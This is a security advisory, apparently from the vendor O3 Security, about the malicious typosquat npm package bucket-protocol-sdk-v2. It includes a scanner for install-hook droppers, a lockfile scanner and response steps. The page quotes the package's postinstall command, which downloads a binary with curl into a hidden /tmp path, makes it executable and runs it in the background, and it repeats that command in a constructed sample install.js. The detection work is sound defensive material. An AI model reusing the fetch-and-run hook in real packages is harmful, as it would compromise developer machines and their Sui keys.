bucket-protocol-sdk-v2 (npm)
Malicious code in bucket-protocol-sdk-v2 (npm). Remove it immediately and rotate any exposed credentials.
What this malware does
bucket-protocol-sdk-v2 advertises itself as a 'community maintained drop-in replacement' for the Sui ecosystem's bucket-protocol-sdk, but its src/ tree contains only empty stubs (bucket.ts: export {};, index.ts: export * from './bucket';). No real SDK code is shipped; the entire payload is the postinstall hook.

package.json declares "postinstall": "node install.js", which npm runs automatically during install unless lifecycle scripts are disabled (--ignore-scripts). install.js first checks whether the host is a Sui developer machine (presence of the sui binary or ~/.sui/sui_config/client.yaml) and, if so, runs curl -s -L -o /tmp/.sui-helper ${implantUrl} && chmod +x /tmp/.sui-helper && /tmp/.sui-helper & to fetch, stage, and background-execute an attacker binary at a hidden /tmp path. The variable is literally named implantUrl and carries the comment PUT YOUR ACTUAL 0x0.st URL HERE, identifying the intended payload host as the anonymous 0x0.st file dump.

In this published version the URL is an empty string (a staged or broken release), so installing it today does not fetch a binary. The dropper scaffolding, the developer-machine gate, the hidden staging path, the backgrounded execution and the typosquat-of-a-Sui-SDK lure are nonetheless unambiguous, and any subsequent republish trivially fills in the URL. The combination of hostile-named scaffolding, dev-machine-targeting gate, anonymous-host comment and hollow library content matches the namespace-abuse-typosquat-with-payload and generic-binary-runner-dropper patterns.
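As an added illustration (not code from the package, from the page, or from O3), the following Node script performs the static check a reviewer would run on an unpacked npm tarball: it enumerates the install-time lifecycle hooks in package.json, follows "node <file>" references to the script each hook invokes, and scans the result for the stage-and-run indicators described above. The sample package.json and install.js are constructed from the description on this page; the `command -v sui` call is an assumption about how the binary check is written, and the URL is left empty as in the published version. The sample is only ever scanned as text, never executed.

```javascript
'use strict';

// Lifecycle scripts npm runs on its own during `npm install`; any of them can
// execute arbitrary code on the installing machine.
const INSTALL_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare'];

// Textual indicators of the stage-and-run dropper pattern: fetch a remote
// file, hide it under /tmp, mark it executable, launch it in the background,
// gate on a Sui developer environment, point at an anonymous file host.
const DROPPER_RULES = [
  { id: 'remote-fetch',      re: /\b(?:curl|wget)\b/ },
  { id: 'hidden-tmp-path',   re: /\/tmp\/\.[\w.-]+/ },
  { id: 'chmod-exec',        re: /\bchmod\s+\+x\b/ },
  { id: 'backgrounded-exec', re: /[^&]&\s*(?:$|[`'"])/m }, // a lone trailing `&`, not `&&`
  { id: 'sui-dev-gate',      re: /\.sui\/sui_config|\bsui\b/ },
  { id: 'anon-host-ref',     re: /0x0\.st|implant/i },
];

// "node install.js" style references inside a hook command, so the script the
// hook runs is scanned together with the command itself.
function referencedScripts(command) {
  const out = [];
  const re = /\bnode\s+(?:-[\w-]+\s+)*([\w./-]+\.[cm]?js)\b/g;
  let m;
  while ((m = re.exec(command)) !== null) out.push(m[1].replace(/^\.\//, ''));
  return out;
}

// pkg: parsed package.json; files: map of path inside the tarball -> text.
function analyzeInstallHooks(pkg, files) {
  const scripts = (pkg && pkg.scripts) || {};
  const hooks = [];
  const seen = new Set();
  for (const hook of INSTALL_HOOKS) {
    const command = scripts[hook];
    if (!command) continue;
    const texts = [command];
    for (const p of referencedScripts(command)) if (files[p] !== undefined) texts.push(files[p]);
    const text = texts.join('\n');
    const matched = [];
    for (const rule of DROPPER_RULES) if (rule.re.test(text)) { matched.push(rule.id); seen.add(rule.id); }
    hooks.push({ hook, command, findings: matched });
  }
  const findings = [...seen];
  // Remote fetch plus "make executable" or "run in background" is the dropper
  // shape; a bare fetch still deserves a human look.
  let verdict = 'clean';
  if (seen.has('remote-fetch')) {
    verdict = seen.has('chmod-exec') || seen.has('backgrounded-exec') ? 'dropper' : 'suspicious';
  }
  return { hooks, findings, verdict };
}

// Constructed sample modeled on the description above. The URL is empty, as in
// the published version; the `command -v sui` line is an assumption about how
// the binary presence is tested. This text is scanned, never run.
const SAMPLE_PACKAGE_JSON = {
  name: 'bucket-protocol-sdk-v2',
  scripts: { postinstall: 'node install.js' },
};
const SAMPLE_FILES = {
  'install.js': [
    "const fs = require('fs');",
    "const os = require('os');",
    "const { execSync } = require('child_process');",
    "const implantUrl = ''; // PUT YOUR ACTUAL 0x0.st URL HERE",
    "const cfg = `${os.homedir()}/.sui/sui_config/client.yaml`;",
    'let hasSui = fs.existsSync(cfg);',
    "try { execSync('command -v sui'); hasSui = true; } catch (e) {}",
    'if (hasSui) execSync(`curl -s -L -o /tmp/.sui-helper ${implantUrl} && chmod +x /tmp/.sui-helper && /tmp/.sui-helper &`);',
  ].join('\n'),
  'src/index.ts': "export * from './bucket';",
  'src/bucket.ts': 'export {};',
};

// Demo run: prints the hook, the six matched indicators and verdict "dropper".
console.log(JSON.stringify(analyzeInstallHooks(SAMPLE_PACKAGE_JSON, SAMPLE_FILES), null, 2));
```

A benign native module whose postinstall is "node-gyp rebuild" produces a listed hook with no findings and the verdict "clean"; the point of the rules is the combination, not any single keyword.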
Malicious versions
Indicators of compromise (SHA-256)
Detection & response playbook
Typosquat
Find it
Scan your JavaScript lockfiles (package-lock.json, npm-shrinkwrap.json, yarn.lock, pnpm-lock.yaml), node_modules trees and build artifacts for bucket-protocol-sdk-v2 (7 malicious versions); Python lockfiles such as requirements.txt or poetry.lock cannot carry an npm package. O3 Security's supply-chain scanner checks every dependency against known-malicious package intelligence at install time and in CI, flagging bucket-protocol-sdk-v2 across your stack and pipelines.
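An added example of the lockfile scan (not O3's scanner and not code from the page): a Node script that finds every resolved occurrence of a package name in package-lock.json / npm-shrinkwrap.json (lockfile versions 1 to 3), yarn.lock (classic and berry) and pnpm-lock.yaml (v5, v6 and v9 key styles), and returns nothing for files that cannot hold an npm package. The lockfile contents and the version numbers in them are constructed placeholders; compare real hits against the advisory's list of malicious versions. The sample also carries the legitimate bucket-protocol-sdk so the scan can be seen to distinguish it from the typosquat.

```javascript
'use strict';

function escapeRegExp(s) {
  return s.replace(/[.*+?^${}()|[\]\\]/g, '\\$&');
}

// package-lock.json / npm-shrinkwrap.json: lockfileVersion 2/3 keep a
// "packages" map keyed by install path; v1 nests "dependencies".
function scanNpmLock(text, name) {
  const lock = JSON.parse(text);
  const hits = [];
  if (lock.packages) {
    for (const [p, meta] of Object.entries(lock.packages)) {
      if (p === `node_modules/${name}` || p.endsWith(`/node_modules/${name}`)) hits.push({ version: meta.version });
    }
    return hits;
  }
  const walk = (deps) => {
    for (const [dep, meta] of Object.entries(deps || {})) {
      if (dep === name) hits.push({ version: meta.version });
      walk(meta.dependencies);
    }
  };
  walk(lock.dependencies);
  return hits;
}

// yarn.lock (classic or berry): a non-indented header lists the specifiers
// resolved by the block; an indented "version" line gives the resolved version.
function scanYarnLock(text, name) {
  const hits = [];
  let inBlock = false;
  for (const raw of text.split('\n')) {
    if (/^\S/.test(raw) && raw.trimEnd().endsWith(':')) {
      const specs = raw.trimEnd().slice(0, -1).split(',').map((s) => s.trim().replace(/^"|"$/g, ''));
      inBlock = specs.some((s) => s.startsWith(`${name}@`));
      continue;
    }
    if (inBlock) {
      const m = raw.match(/^\s+version:?\s+"?([^"\s]+)"?\s*$/);
      if (m) { hits.push({ version: m[1] }); inBlock = false; }
    }
  }
  return hits;
}

// pnpm-lock.yaml: keys under "packages:" look like "/name/1.2.3:" (v5),
// "/name@1.2.3:" (v6) or "name@1.2.3:" (v9), optionally with a "(peer)" suffix.
function scanPnpmLock(text, name) {
  const re = new RegExp(`^\\s+/?${escapeRegExp(name)}[@/]([^\\s:(]+)`);
  const hits = [];
  let inPackages = false;
  for (const raw of text.split('\n')) {
    if (/^\S/.test(raw)) { inPackages = raw.startsWith('packages:'); continue; }
    if (!inPackages) continue;
    const m = raw.match(re);
    if (m) hits.push({ version: m[1] });
  }
  return hits;
}

function scanLockfile(fileName, text, name) {
  const base = fileName.split(/[\\/]/).pop();
  let hits = [];
  if (base === 'package-lock.json' || base === 'npm-shrinkwrap.json') hits = scanNpmLock(text, name);
  else if (base === 'yarn.lock') hits = scanYarnLock(text, name);
  else if (base === 'pnpm-lock.yaml') hits = scanPnpmLock(text, name);
  // anything else (requirements.txt, poetry.lock, ...) cannot contain an npm package
  return hits.map((h) => ({ file: fileName, version: h.version }));
}

// files: map of lockfile path -> text. Returns [{file, version}] for every hit.
function scanLockfiles(files, name) {
  return Object.entries(files).flatMap(([f, t]) => scanLockfile(f, t, name));
}

// Constructed sample lockfiles; 0.0.x versions are placeholders, not the
// advisory's version list.
const SAMPLE_LOCKFILES = {
  'package-lock.json': JSON.stringify({
    name: 'sample-app', lockfileVersion: 3, requires: true,
    packages: {
      '': { dependencies: { 'bucket-protocol-sdk-v2': '^0.0.1' } },
      'node_modules/bucket-protocol-sdk': { version: '0.0.9' },
      'node_modules/bucket-protocol-sdk-v2': { version: '0.0.1', hasInstallScript: true },
    },
  }),
  'yarn.lock': ['# yarn lockfile v1', '', '"bucket-protocol-sdk-v2@^0.0.2":', '  version "0.0.2"', '',
    'lodash@^4.17.21:', '  version "4.17.21"', ''].join('\n'),
  'pnpm-lock.yaml': ["lockfileVersion: '9.0'", '', 'importers:', '  .:', '    dependencies:',
    '      bucket-protocol-sdk-v2:', '        specifier: ^0.0.3', '        version: 0.0.3', '',
    'packages:', '  bucket-protocol-sdk-v2@0.0.3:', '    hasBin: false', ''].join('\n'),
  'requirements.txt': 'requests==2.32.3\n',
};

console.log(scanLockfiles(SAMPLE_LOCKFILES, 'bucket-protocol-sdk-v2'));
```

In a real repository, feed the function the text of every lockfile found under the tree (including vendored or nested ones) and treat any hit as the trigger for the response steps below; the npm lockfile's hasInstallScript flag on the same entry is a further sign that a lifecycle hook ran at install.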
If you installed it — respond
bucket-protocol-sdk-v2 is a typosquat: you almost certainly intended the legitimate bucket-protocol-sdk. Remove bucket-protocol-sdk-v2, install the correct package, and rotate any secrets the installing host could reach, since the postinstall hook runs during install unless scripts were disabled. On hosts that pass the hook's Sui check (sui binary or ~/.sui/sui_config/client.yaml present), look for /tmp/.sui-helper; if it exists, a fetch succeeded: stop the process, keep a copy of the file for analysis, and treat the machine and the Sui keys on it as compromised.
Did it already run?
If bucket-protocol-sdk-v2 was ever installed, its postinstall hook has already run with the installing user's privileges. In the published version described above the implant URL is empty, so nothing was fetched; a republish with the URL filled in would download and launch /tmp/.sui-helper on any host that passes the Sui check. O3's L7 egress monitoring and runtime eBPF sensors detect the credential exfiltration or command-and-control callback after install and block the malicious outbound channel, so you catch and contain the actual compromise, not just the presence of the package.
How O3 protects you
O3 blocks bucket-protocol-sdk-v2 before install through its supply-chain scanner, and if it has already run, detects and severs the exfiltration or C2 callback at runtime through L7 egress monitoring and eBPF.
Frequently asked questions
Campaign
References
Credits
- Amazon Inspector · finder
Detect & block this
O3 blocks bucket-protocol-sdk-v2-class packages before install and in CI — and if it already ran, its runtime egress monitoring catches the malicious outbound activity and severs the channel.